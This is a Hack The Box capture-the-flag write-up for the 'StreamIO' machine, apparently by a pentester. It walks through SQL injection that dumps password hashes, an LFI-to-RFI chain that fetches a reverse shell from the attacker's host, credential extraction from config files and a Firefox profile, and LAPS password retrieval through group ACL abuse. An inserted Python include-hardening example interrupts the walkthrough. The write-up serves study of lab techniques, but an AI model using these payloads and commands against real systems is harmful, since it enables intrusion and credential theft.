
HTB - StreamIO
Machine Info
StreamIO is a medium machine that covers subdomain enumeration leading to an SQL injection, used to retrieve stored user credentials, which are cracked to gain access to an administration panel. The administration panel is vulnerable to LFI, which allows us to retrieve the source code of the administration pages and leads to identifying a remote file inclusion vulnerability; abusing it gains us access to the system. After the initial shell we leverage the SQLCMD command line utility to enumerate databases and obtain further credentials used for lateral movement. As the secondary user we find that the Firefox profile contains a database from which saved credentials can be extracted. Using the new credentials within BloodHound we discover that the user has the ability to add themselves to a specific group whose members can read LDAP secrets. Without direct access to the account, we use PowerShell to abuse this feature and add ourselves to the `Core Staff` group, then query LDAP to disclose the administrator LAPS password.
Enumeration
Scope
IP Address: 10.10.11.158
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
443/tcp open https syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ nmap -p53,80,88,135,139,389,443,445,464,593,3268,3269,5985 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-09 09:09:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after: 2022-03-24T07:03:28
|_ssl-date: 2024-07-09T09:10:11+00:00; +7h00m03s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-09T09:09:33
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m02s
* Open ports: 53,80,88,135,139,389,443,445,464,593,3268,3269,5985
* UDP Open ports: 53,88,123,389
* Services: DNS - HTTP - HTTPS - RPC - SMB - KERBEROS - LDAP - winRM
* Versions: IIS httpd 10.0
* Important Notes: Domain: streamIO.htb - DNS:watch.streamIO.htb
Before I start the enumeration process, I will update /etc/hosts with the hostnames from the Nmap script output.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ sudo sh -c "echo '$ip streamIO.htb watch.streamIO.htb' >> /etc/hosts"
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ tail -n1 /etc/hosts
10.10.11.158 streamIO.htb watch.streamIO.htb
DNS Enumeration
I tried a zone transfer, but it failed.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ dig axfr streamIO.htb @$ip
; <<>> DiG 9.19.19-1-Debian <<>> axfr streamIO.htb @10.10.11.158
;; global options: +cmd
; Transfer failed.
RPC & SMB Enumeration
I got access denied when enumerating both services.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ rpcclient -U "%" $ip
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ smbclient -N -L //$ip
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.11.158 445 DC [-] streamIO.htb\: STATUS_ACCESS_DENIED
KERBEROS Enumeration
Then I attempted username enumeration, looking for a possible path in, but nothing was found either.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ kerbrute userenum --dc $ip -d StreamIO.htb -t 100 -o users.list /usr/share/wordlists/seclists/Usernames/jsmith.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
2024/07/08 22:27:10 > Done! Tested 48705 usernames (0 valid) in 57.952 seconds
HTTP & HTTPS enumeration
http://10.10.11.158

https://10.10.11.158

I tried fuzzing subdomains over HTTP and found nothing; however, when I repeated the subdomain fuzzing over HTTPS, I got a hit.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://$ip/ -H "Host: FUZZ.StreamIO.htb" -fs 703 -t 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
<snip>
:: Progress: [19966/19966] :: Job [1/1] :: 444 req/sec :: Duration: [0:01:00] :: Errors: 0 ::
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u https://$ip/ -H "Host: FUZZ.StreamIO.htb" -fs 703 -t 200 -k
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
<snip>
watch [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 1478ms]
https://watch.streamIO.htb

I looked at Wappalyzer to see which technologies are in use, and PHP caught my attention, as it's not common to run PHP on IIS. So I attempted directory fuzzing against https://watch.streamIO.htb

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt:FUZZ -u https://watch.streamIO.htb/FUZZ -k -t 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
index.php [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 2171ms]
search.php [Status: 200, Size: 253887, Words: 1, Lines: 1, Duration: 3382ms]
Index.php [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 867ms]
Also, attempt PHP file fuzzing on https://streamIO.htb
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt:FUZZ -u https://streamIO.htb/FUZZ -t 200 -k
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
index.php [Status: 200, Size: 13497, Words: 5027, Lines: 395, Duration: 366ms]
login.php [Status: 200, Size: 4145, Words: 796, Lines: 111, Duration: 479ms]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 470ms]
about.php [Status: 200, Size: 7825, Words: 2228, Lines: 231, Duration: 786ms]
register.php [Status: 200, Size: 4500, Words: 905, Lines: 121, Duration: 841ms]
contact.php [Status: 200, Size: 6434, Words: 2010, Lines: 206, Duration: 1200ms]
https://streamIO.htb/login.php

I don't have any credentials yet, so I will return to this page once I obtain some.
https://watch.streamIO.htb/search.php

It's a search function that looks up a film name in a specific table, which means a database backend, so we can attempt SQL injection.
When I sent a simple payload, I got blocked by some security defences in place.

blocked.php

So I can't use SQLMap and will continue manually.
Something interesting caught my attention here: when I type a word like man, it is matched on both sides.

It returns Batman and Anger Management, so it uses wildcards on both sides of the term, such as *Search*.
The SQL command is probably something like this:
SELECT * From movies where Film_name = '*input*'
I can break out of the query with an input like input';--
SELECT * From movies where Film_name = '*input';-- *'
I was right: when I typed man';--
it matched the wildcard only on the right side, because we have already closed the quote on the left side.

Let's create our exploit. I tried union 1,2,... with an increasing number of columns until I got a hit at union 1,2,3,4,5,6
SELECT * From movies where Film_name = '*anything' union select 1,2,3,4,5,6 -- *'

Field 2 is reflected in the page, so I will inject my queries into it.

So we're dealing with an MSSQL database, and we can use commands from this cheat sheet:
Get the user name:

Current Database:

We're on an MSSQL database, so one common attack vector is to capture the hash of the current database user by executing the following command. I tried it but failed, as I got the machine account hash, which couldn't be cracked.
anthing' EXEC master..xp_dirtree '\\10.10.16.3\share\';--
Continue exploring the database

We're already in STREAMIO; let's explore the tables.

When I provided an asterisk * it didn't return anything, but when I provided username
it returned a list of usernames.


When I provided password, it returned a list of hashes, but copying and pasting them one by one would be a waste of time.

I looked at Burp to see which HTML tag the hashes are wrapped in.

So I will use a curl command to get the list of hashes and filter the results.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ curl -k -XPOST https://watch.streamIO.htb/search.php -d "q=anything' union select 1,password,3,4,5,6 FROM users;--" | grep '<h5 class="p-2">' | awk '{print $2}' | cut -d\> -f2 | tee -a hashes.txt
<snip>
0049ac57646627b8d7aeaccf8b6a936f
08344b85b329d7efd611b7a7743e8a09
083ffae904143c4796e464dac33c1f7d
0cfaaaafb559f081df2befbe66686de0
<snip>
I will do the same for the usernames.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ curl -k -XPOST https://watch.streamIO.htb/search.php -d "q=anything' union select 1,username,3,4,5,6 FROM users;--" | grep '<h5 class="p-2">' | awk '{print $2}' | cut -d\> -f2 | tee -a users.txt
<snip>
Theodore
Victor
Victoria
William
yoshihide
Initial Access
The username list is too big for brute forcing, so I will find out who really has an account on the machine by enumerating Kerberos.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ kerbrute userenum --dc $ip -d streamIO.htb -t 100 -o users.list ./users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
2024/07/09 00:35:59 > [+] VALID USERNAME: yoshihide@streamIO.htb
I now have a user list and a hash list. Let's attempt to crack the hashes and then try brute forcing.
First, start hashcat in auto-detection mode to identify the hash type.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat hashes.txt /usr/share/wordlists/rockyou.txt
======+============================================================+===================
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
70 | md5(utf16le($pass)) | Raw Hash
2600 | md5(md5($pass)) | Raw Hash salted and/or iterated
3500 | md5(md5(md5($pass))) | Raw Hash salted and/or iterated
4400 | md5(sha1($pass)) | Raw Hash salted and/or iterated
20900 | md5(sha1($pass).md5($pass).sha1($pass)) | Raw Hash salted and/or iterated
4300 | md5(strtoupper(md5($pass))) | Raw Hash salted and/or iterated
1000 | NTLM | Operating System
9900 | Radmin2 | Operating System
8600 | Lotus Notes/Domino 5 | Enterprise Application Software (EAS)
Not all the hashes were cracked, but we will be fine with what we found.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
<snip>
Session..........: hashcat
Status...........: Exhausted
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt --show
08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$
3577c47eb1e12c8ba021611e1280753c:highschoolmusical
54c88b2dbd7b1a84012fabc1a4c73415:$hadoW
665a50ac9eaa781e4f7f04199db97a11:paddpadd
6dcd87740abb64edfa36d170f0d5450d:$3xybitch
b22abb47a02b52d5dfa27fb0b534f693:!5psycho8!
b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
b83439b16f844bd6ffe35c02fe21b3c0:!?Love?!123
ee0b8a0937abd60c2882eacb2f8dc49f:physics69i
ef8f3d30a856cf166fb8215aca93e9ff:%$clara
f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
Creating a password list for brute forcing
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt --show | cut -d: -f2 | tee -a pass.lst
<snip>
highschoolmusical
$hadoW
paddpadd
<snip>
Unfortunately, I didn't get a hit when I tried brute forcing.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u yoshihide -p pass.lst
SMB 10.10.11.158 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:##123a8j8w5123## STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:$monique$1991$ STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:highschoolmusical STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:$hadoW STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:paddpadd STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:$3xybitch STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:!5psycho8! STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:66boysandgirls.. STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:!?Love?!123 STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:physics69i STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:%$clara STATUS_LOGON_FAILURE
SMB 10.10.11.158 445 DC [-] streamIO.htb\yoshihide:!!sabrina$ STATUS_LOGON_FAILURE
I remember the login.php page that I left behind because I didn't have any credentials.
Intercept the request, send it to Intruder, and then start the attack with the passwords we have.

Fuzzing for the '/admin' directory and its parameters
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u https://streamIO.htb/FUZZ -t 200 -k
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
images [Status: 301, Size: 151, Words: 9, Lines: 2, Duration: 694ms]
admin [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 1498ms]
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt:FUZZ -u https://streamIO.htb/admin/FUZZ -t 200 -k
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
index.php [Status: 403, Size: 18, Words: 1, Lines: 1, Duration: 901ms]
master.php [Status: 200, Size: 58, Words: 5, Lines: 2, Duration: 617ms]
https://streamio.htb/admin/master.php

There is a missing parameter or something similar, so let's try parameter fuzzing.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u https://streamIO.htb/admin/?FUZZ= -t 200 -k -fs 1678 -H "Cookie: PHPSESSID=nnt2pl59ell9hqjdvu82ugegpf"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
debug [Status: 200, Size: 1712, Words: 90, Lines: 50, Duration: 987ms]
movie [Status: 200, Size: 320235, Words: 15986, Lines: 10791, Duration: 596ms]
user [Status: 200, Size: 2073, Words: 146, Lines: 63, Duration: 1524ms]
staff [Status: 200, Size: 12484, Words: 1784, Lines: 399, Duration: 8876ms]
https://streamio.htb/admin/?debug=

I tried LFI in this parameter and got a hit: https://streamio.htb/admin/?debug=C:\Windows\System32\drivers\etc\hosts

I will use this vulnerability to read the content of master.php using a PHP wrapper.

Shell as yoshihide
echo "onlyPGgxPk1vdmllIG1hbmFnbW......." | base64 -d | tee -a master.php
The file checks that it has been included rather than requested directly:
cat master.php
<?php
if(!defined('included'))
    die("Only accessable through includes");
<snip>
Looking at the end of the code, it takes its input from the include parameter of a POST request.
<?php
if(isset($_POST['include']))
{
    if($_POST['include'] !== "index.php" )
        eval(file_get_contents($_POST['include']));
    else
        echo(" ---- ERROR ---- ");
}
?>
I will include master.php through https://streamio.htb/admin/?debug= and add the include parameter to the POST request to satisfy both conditions.
We found LFI earlier, but RFI didn't work on the debug= parameter, so I will try RFI on the include parameter.
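The include handler above rejects exactly one name (index.php) and hands everything else, URLs included, to file_get_contents() and then eval(). The hardened shape is a positive allowlist, with remote URLs and path separators refused outright before any file is touched. The following Python is an added example (a stand-in for the PHP handler, not the site's or the write-up's code) that applies those checks in the order a hardened handler would; the allowlist entries movie.php, user.php and staff.php and the base directory /srv/www/admin are assumptions.

```python
import os

# Hypothetical allowlist of admin page names this example permits. Anything
# not listed here is rejected, whatever the request says.
ALLOWED_INCLUDES = frozenset({"movie.php", "user.php", "staff.php"})

# Schemes PHP's file_get_contents() would happily open as a stream.
STREAM_WRAPPERS = ("php:", "data:", "file:", "ftp:", "http:", "https:")


def check_include(base_dir, requested):
    """Return (ok, detail). ok is True only when `requested` is an allowlisted
    bare file name that resolves to a location inside base_dir; detail is the
    resolved path on success or the reason for refusal otherwise."""
    lowered = requested.lower()
    # 1. A URL or stream wrapper is exactly what turns an include into RFI.
    if "://" in requested or lowered.startswith(STREAM_WRAPPERS):
        return False, "remote or wrapper include refused"
    # 2. Separators or drive letters mean traversal out of the admin directory.
    if any(ch in requested for ch in ("/", "\\", ":", "\x00")):
        return False, "path separators refused"
    # 3. Positive allowlist instead of the original single-name denylist.
    if requested not in ALLOWED_INCLUDES:
        return False, "not an allowlisted include"
    # 4. Defence in depth: the resolved path must still be inside base_dir.
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, path]) != base:
        return False, "resolved path escapes base directory"
    return True, path


if __name__ == "__main__":
    # Constructed requests: the two the write-up used plus a traversal attempt.
    for req in ("movie.php",
                "index.php",
                "http://10.10.16.3/shell.php",
                "C:\\Windows\\System32\\drivers\\etc\\hosts",
                "../login.php"):
        ok, detail = check_include("/srv/www/admin", req)
        print(f"{req!r:50} -> {'OK' if ok else 'REJECT'}: {detail}")
```

Only the last step consults the filesystem, and only after the name has passed the allowlist, so a request never reaches file_get_contents() or eval() unless it names one of a fixed set of local files. The order also gives distinct log messages for remote, traversal and unknown-name attempts, which is what a detection rule on the web server would key on.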


We got a hit. Let's create a webshell.
system("PowerShell -c powershell -e <base64>");
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ curl -XPOST https://streamio.htb/admin/?debug=master.php -d "include=http://10.10.16.3/shell.php" -H "Cookie: PHPSESSID=nujp4k6q68sd43p4jc439fuepo" -k
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.158] 59891
PS C:\inetpub\streamio.htb\admin>
I looked around, found login.php and decided to explore its contents.
PS C:\inetpub\streamio.htb> dir
Directory: C:\inetpub\streamio.htb
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/22/2022 2:49 AM admin
d----- 2/22/2022 2:49 AM css
d----- 2/22/2022 2:49 AM fonts
d----- 2/22/2022 2:49 AM images
d----- 2/22/2022 3:19 AM js
-a---- 2/23/2022 2:16 AM 4341 about.php
-a---- 2/23/2022 2:16 AM 1357 about_include.php
-a---- 2/23/2022 2:16 AM 2908 contact.php
-a---- 2/23/2022 2:16 AM 1706 contact_include.php
-a---- 7/30/2021 1:57 AM 1150 favicon.ico
-a---- 2/22/2022 3:21 AM 1812 header_include.php
-a---- 2/25/2022 11:57 PM 7337 index.php
-a---- 2/23/2022 2:16 AM 2415 info_include.php
-a---- 2/26/2022 8:27 AM 3938 login.php
-a---- 2/23/2022 2:16 AM 216 logout.php
-a---- 2/25/2022 11:42 PM 4480 register.php
PS C:\inetpub\streamio.htb> type login.php
<snip>
<?php
$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
$handle = sqlsrv_connect('(local)',$connection);
function bad_char_check($name
I searched for other passwords that might exist and found one more.
PS C:\inetpub\streamio.htb> ls -Force | select-string -pattern "PWD"
login.php:46:$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
register.php:81: $connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
These are passwords for the MSSQL database:
db_user:'B1@hB1@hB1@h'
db_admin:'B1@hx31234567890'
Shell as nikk37
Let's examine the DB with the SQLCMD tool.
PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_user -P 'B1@hB1@hB1@h' -Q "select @@version"
----------------------------------------------------------------------------------------
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
(1 rows affected)
PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_admin -P 'B1@hx31234567890' -Q "use streamio_backup"
Changed database context to 'streamio_backup'.
PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_admin -P 'B1@hx31234567890' -Q "SELECT table_name FROM streamio_backup.INFORMATION_SCHEMA.TABLES"
table_name
----------------------------------------------------------------------------------------
movies
users
PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_admin -P 'B1@hx31234567890' -d 'streamio_backup' -Q "select * from users"
id username password
----------- -------------------------------------------------- -------------------------
1 nikk37 389d14cb8e4e9b94b137deb1caf0612a
2 yoshihide b779ba15cedfd22a023c4d8bcf5f2332
3 James c660060492d9edcaa8332d89c99c9239
4 Theodore 925e5408ecb67aea449373d668b7359e
5 Samantha 083ffae904143c4796e464dac33c1f7d
6 Lauren 08344b85b329d7efd611b7a7743e8a09
7 William d62be0dc82071bccc1322d64ec5b6c51
8 Sabrina f87d3c0d6c8fd686aacc6627f1f493a5
Shorten our user list by confirming which usernames actually exist as domain accounts.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ kerbrute userenum --dc $ip -d StreamIO.htb -t 100 -o users.list ./backup_users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
2024/07/09 03:41:07 > [+] VALID USERNAME: yoshihide@StreamIO.htb
2024/07/09 03:41:07 > [+] VALID USERNAME: nikk37@StreamIO.htb
Only one hash was cracked, so it must belong to one of the two users.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat -m 0 backup_hashes /usr/share/wordlists/rockyou.txt
389d14cb8e4e9b94b137deb1caf0612a:get_dem_girls2xxxxxxxxxxxx
Confirm
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u 'nikk37' -p 'get_dem_girls2xxxxxxxxx'
SMB 10.10.11.158 445 DC [+] streamIO.htb\nikk37:get_dem_girls2xxxxxxxxx
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ evil-winrm -i $ip -u nikk37 -p 'get_dem_girls2xxxxxxxxxx'
*Evil-WinRM* PS C:\Users\nikk37\Documents> type ..\Desktop\user.txt
a00c4e521d2bed26c166xxxxxxxxxxxxx
User Flag: a00c4e521d2bed26c166xxxxxxxxxxxxx
Privilege Escalation
I found that the system has Mozilla Firefox installed, so I looked at the user's Mozilla profile and copied it to my Kali machine to try to decrypt the Firefox secrets and cookies.
Start SMB Server
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ smbserver
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
*Evil-WinRM* PS C:\Users\nikk37> net use z: \\10.10.16.3\share /user:blind0bandit blind0bandit
The command completed successfully.
*Evil-WinRM* PS C:\Users\nikk37> copy -r AppData\Roaming\Mozilla\FireFox\Profiles\br53rxeg.default-release\ z:
I changed into the folder I copied from the Windows box and ran firepwd.py to decrypt the Firefox secrets.
┌──(kali㉿kali)-[~/…/HTB/machines/StreamIO/br53rxeg.default-release]
└─$ python3 /opt/firepwd/firepwd.py
<snip>
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
I found some credentials; let's try them against the accounts by brute forcing.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u fire_users -p admin_passwords
<snip>
SMB 10.10.11.158 445 DC [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r
I fired up BloodHound to see what the user JDgodd can do and found the following: JDgodd has WriteOwner on the CORE STAFF group, which enables us to add ourselves to that group, and the CORE STAFF group has the right to read the LAPS password of the DC machine.


Let's list the PowerView commands we will use for that purpose:
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('STREAMIO.HTB\JDGodd', $SecPassword)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "Core Staff" -PrincipalIdentity "streamio\JDgodd"
Add-DomainGroupMember -Credential $cred -Identity "Core Staff" -Members "StreamIO\JDgodd"
I personally use crackmapexec to pull the LAPS password.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u 'JDGodd' -p 'JDg0dd1s@d0p3cr3@t0r' --laps
SMB 10.10.11.158 445 DC [-] DC\administrator:G58E)u0@)96rU1 STATUS_LOGON_FAILURE
An alternative way from the community, using ldapsearch:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ldapsearch -H ldap://10.10.11.158 -b 'DC=streamIO,DC=htb' -x -D JDgodd@streamio.htb -w 'JDg0dd1s@d0p3cr3@t0r' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
<snip>
dn: CN=DC,OU=Domain Controllers,DC=streamIO,DC=htb
ms-Mcs-AdmPwd: G58E)u0@)96rU1
